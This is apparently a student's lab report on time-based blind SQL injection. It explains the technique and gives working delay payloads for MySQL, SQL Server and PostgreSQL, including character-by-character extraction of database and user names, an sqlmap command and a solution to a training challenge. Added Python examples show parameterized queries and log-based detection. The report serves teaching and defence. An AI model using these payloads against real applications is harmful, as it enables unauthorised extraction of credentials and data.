
Lab10 Blind SQL injection - Timebase SQL Injection

Lab 10 focuses on Time-Based SQL Injection, a technique where attackers exploit response times to infer database information without direct data retrieval. Participants learn to identify vulnerabilities, craft SQL queries that introduce delays, and extract data bit by bit. The lab emphasizes the importance of understanding the mechanics of this attack and effective mitigation strategies, culminating in a report and video demonstration of the process.

Uploaded by daoquangviet2003

Lab 10: Blind SQL injection - Timebase SQL Injection

Objective:
- This lab is dedicated to exploring Time-Based SQL Injection, a subtype of SQL injection
attacks where the attacker can infer information from a database by observing the response
time of the web application. Participants will interact with a simulated web application that
has a time-based SQL injection vulnerability. The goal is to understand the mechanics of this
attack, identify vulnerabilities, exploit them, and learn effective mitigation strategies.

In this lab, students need to:

- Answer the following questions:
o What distinguishes Time-Based SQL Injection from other SQL injection techniques?
Explain how an attacker can use time delays in SQL queries to extract information from a
database, and why this method is particularly useful when dealing with blind SQL
injection scenarios where no data is returned in the web application's responses.

Time-Based SQL Injection is a type of blind SQL injection technique that relies on
deliberate time delays to infer information from a database. Unlike other SQL injection
methods that directly retrieve data (such as Union-Based SQL Injection), Time-Based
SQL Injection is particularly useful when the application does not return visible database
errors or output (hence, "blind" SQL injection).

How It Works:
1. Injecting a Time Delay:
The attacker crafts an SQL query that includes a conditional delay, typically using
database-specific functions such as:
- MySQL: SLEEP(seconds)
- Microsoft SQL Server: WAITFOR DELAY 'hh:mm:ss'
- PostgreSQL: pg_sleep(seconds)
2. Observing Response Time:
- If the condition in the query is true, the database executes the delay, causing a
noticeable slowdown in the web application's response.
- If the condition is false, the response is returned immediately.
3. Extracting Data Bit by Bit:
- By crafting boolean conditions inside the SQL query, the attacker can systematically
test individual characters or bits of data.
Example (MySQL-based injection):
SELECT IF(SUBSTRING((SELECT database()),1,1)='a', SLEEP(5), 0);
- If the first character of the database name is 'a', the response is delayed by 5
seconds.
- If not, the response is immediate.
- Repeating this process for each character allows the attacker to reconstruct the
entire database name.
Why Is This Useful in Blind SQL Injection?
- No Direct Data Exposure: Many modern web applications suppress error messages
and prevent direct data retrieval via UNION queries.
- Bypassing Security Filters: Since no explicit data is returned, simple filters that block
error-based or union-based injections may not detect this method.
- Reliable Even in Restricted Environments: As long as the application's response time
can be observed, this attack can be executed without needing visible database
errors.
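An added example (not part of the lab or its answers) showing why the injected delay runs at all: the probe the answer quotes, `' OR SLEEP(5) --`, is sent through a string-concatenated query and through a parameterized one. SQLite stands in for the lab's MySQL backend and has no SLEEP(), so a counting stand-in is registered; the products table and the names `lookup_vulnerable`, `lookup_safe` and `probe_result` are this example's own assumptions.

```python
# Added example, not the lab's code. SQLite stands in for the lab's MySQL
# backend; it has no SLEEP(), so we register one that only counts its calls.
import sqlite3

PROBE = "' OR SLEEP(5) --"   # the vulnerability probe quoted in the lab answer


def make_db():
    """Throwaway database with a constructed products table and a fake SLEEP()."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    conn.execute("INSERT INTO products VALUES (1, 'widget'), (2, 'gadget')")
    calls = []
    # A real SLEEP() would stall here; ours records the call and returns 1 (truthy).
    conn.create_function("SLEEP", 1, lambda secs: calls.append(secs) or 1)
    return conn, calls


def lookup_vulnerable(conn, name):
    """String concatenation: the input is parsed as part of the SQL statement."""
    sql = "SELECT id FROM products WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, name):
    """Parameterized query: the input is bound as a value, never parsed as SQL."""
    sql = "SELECT id FROM products WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


def probe_result(lookup):
    """Run the lab's probe through one lookup; return (SLEEP calls, ids matched)."""
    conn, calls = make_db()
    ids = lookup(conn, PROBE)
    return len(calls), ids


if __name__ == "__main__":
    # Vulnerable path: SLEEP() fires and the OR matches every row.
    # Safe path: zero SLEEP() calls and no rows, because the probe is just a string.
    print("vulnerable:", probe_result(lookup_vulnerable))
    print("safe:      ", probe_result(lookup_safe))
```

The same split is what the mitigation step of the lab comes down to: the delay can only execute when the input reaches the SQL parser.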

o Describe the process of executing a Time-Based SQL Injection attack on a vulnerable
web application. What are the key steps in crafting a SQL query that causes a deliberate
delay in the database response?

1. Identifying a Vulnerable Input Field

Before launching a Time-Based SQL Injection, the attacker must find an input field that
interacts with the database. This could be:
- A login form (username & password fields).
- A search box that queries the database.
- A URL parameter (e.g., example.com/product.php?id=5).
The attacker tests if the input field is vulnerable by injecting a basic SQL query that
introduces a delay, such as:
' OR SLEEP(5) --
If the page takes 5 seconds longer to respond, it suggests that the database is executing
the injected SQL code.

2. Crafting a Deliberate Time Delay Query

Once confirmed, the attacker can craft more sophisticated queries to extract data bit by
bit. Different databases use different functions to introduce delays:
- MySQL:
' OR IF(1=1, SLEEP(5), 0) --
If 1=1 is true, the database sleeps for 5 seconds before responding.
If the page delays, the injection is working.
- Microsoft SQL Server (IF and WAITFOR are statements, so they need a stacked query):
'; IF (1=1) WAITFOR DELAY '0:0:5' --
- PostgreSQL (likewise as a stacked statement):
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END --
3. Extracting Data Using Conditional Delays
To extract sensitive data (e.g., database name, usernames, or passwords), the attacker
systematically checks one character at a time:
- MySQL Example (Extracting First Letter of Database Name)
' OR IF(SUBSTRING((SELECT database()),1,1)='a', SLEEP(5), 0) --
If the first character of the database name is 'a', the page will delay by 5 seconds.
If not, the response will be instant.
The attacker repeats this for each letter, reconstructing the full database name.
- MySQL Example (Extracting First Letter of the First Username)
' OR IF(SUBSTRING((SELECT user FROM mysql.user LIMIT 1),1,1)='r', SLEEP(5), 0) --
If the first letter of the first username is 'r', the page will delay.
The attacker iterates through characters ('a' to 'z', '0' to '9') until the correct username is fully
extracted.
4. Automating the Process

Manually testing each character is time-consuming, so attackers often use SQLMap, an
automated SQL Injection tool:
sqlmap -u "http://example.com/product.php?id=5" --dbms=mysql --time-sec=5 --technique=T
--dbms=mysql: Specifies MySQL as the target database.
--time-sec=5: Uses a 5-second delay to determine true/false conditions.
--technique=T: Forces the use of time-based SQL injection.
5. Exploiting Extracted Data

Once an attacker extracts database names, table names, and credentials, they can:
- Dump user data (e.g., username & password columns).
- Gain privileged access to the system.
- Escalate the attack to remote code execution (RCE) in some cases.
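An added example (not from the lab) taking the defender's side of the steps above: it scans constructed nginx-style access log lines, whose last field is the request time in seconds, for the delay functions the answer lists and for the alternating stalled/instant timings that character-by-character extraction produces. The log lines, `flag_requests` and `suspect_ips` are constructed for this example, not taken from any real deployment.

```python
# Added example, not from the lab: spot time-based probes in web server logs.
# Constructed nginx-style lines; the last field is $request_time in seconds.
import re
from urllib.parse import unquote_plus

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) \d+ ([\d.]+)$')
# Delay functions named in the lab answer (MySQL, PostgreSQL, SQL Server).
DELAY_RE = re.compile(r"sleep\s*\(|pg_sleep\s*\(|waitfor\s+delay", re.I)

SAMPLE_LOG = """\
10.0.0.7 - - [01/May/2025:10:00:01 +0000] "GET /product.php?id=5 HTTP/1.1" 200 512 0.021
10.0.0.9 - - [01/May/2025:10:00:05 +0000] "GET /product.php?id=5'%20OR%20SLEEP(5)--%20 HTTP/1.1" 200 512 5.034
10.0.0.9 - - [01/May/2025:10:00:11 +0000] "GET /product.php?id=5'%20OR%20IF(SUBSTRING((SELECT%20database()),1,1)='a',SLEEP(5),0)--%20 HTTP/1.1" 200 512 0.019
10.0.0.9 - - [01/May/2025:10:00:12 +0000] "GET /product.php?id=5'%20OR%20IF(SUBSTRING((SELECT%20database()),1,1)='s',SLEEP(5),0)--%20 HTTP/1.1" 200 512 5.041
10.0.0.3 - - [01/May/2025:10:00:20 +0000] "GET /report.php?year=2024 HTTP/1.1" 200 90211 4.800
"""


def parse(log_text):
    """Yield (ip, decoded request target, status, seconds) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ip, target, status, secs = m.groups()
            yield ip, unquote_plus(target), int(status), float(secs)


def flag_requests(log_text, slow_seconds=3.0):
    """One record per request carrying a delay function; note whether it actually stalled."""
    flagged = []
    for ip, target, status, secs in parse(log_text):
        if DELAY_RE.search(target):   # a slow page alone (10.0.0.3) is not enough
            flagged.append({"ip": ip, "target": target, "secs": secs,
                            "stalled": secs >= slow_seconds})
    return flagged


def suspect_ips(log_text, slow_seconds=3.0):
    """IPs whose probes produced both stalled and instant responses: the
    true/false oracle that bit-by-bit extraction relies on."""
    seen = {}
    for rec in flag_requests(log_text, slow_seconds):
        seen.setdefault(rec["ip"], set()).add(rec["stalled"])
    return sorted(ip for ip, outcomes in seen.items() if outcomes == {True, False})
```

On the sample, 10.0.0.3's slow report page is left alone while 10.0.0.9 is reported, because its probes carry SLEEP() and alternate between a 5-second stall and an instant reply.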
- Perform challenge:
o Blind SQL injection with time delays
- Explain and capture all steps (full windows screen capture).

Blind SQL injection with time delays

Open the proxy, turn on intercept, then log in to the lab.

Append this after the TrackingId cookie: '||pg_sleep(10)--


Forward and wait 10 seconds.

We have completed the lab.


Submit a report addressing all the questions mentioned above in either PDF or Markdown format.
Additionally, include a video demonstrating the detailed process of your work to ensure the
authenticity of your lab exercise.
The report file name must be Class_YourStudentID_YourName_Lab10
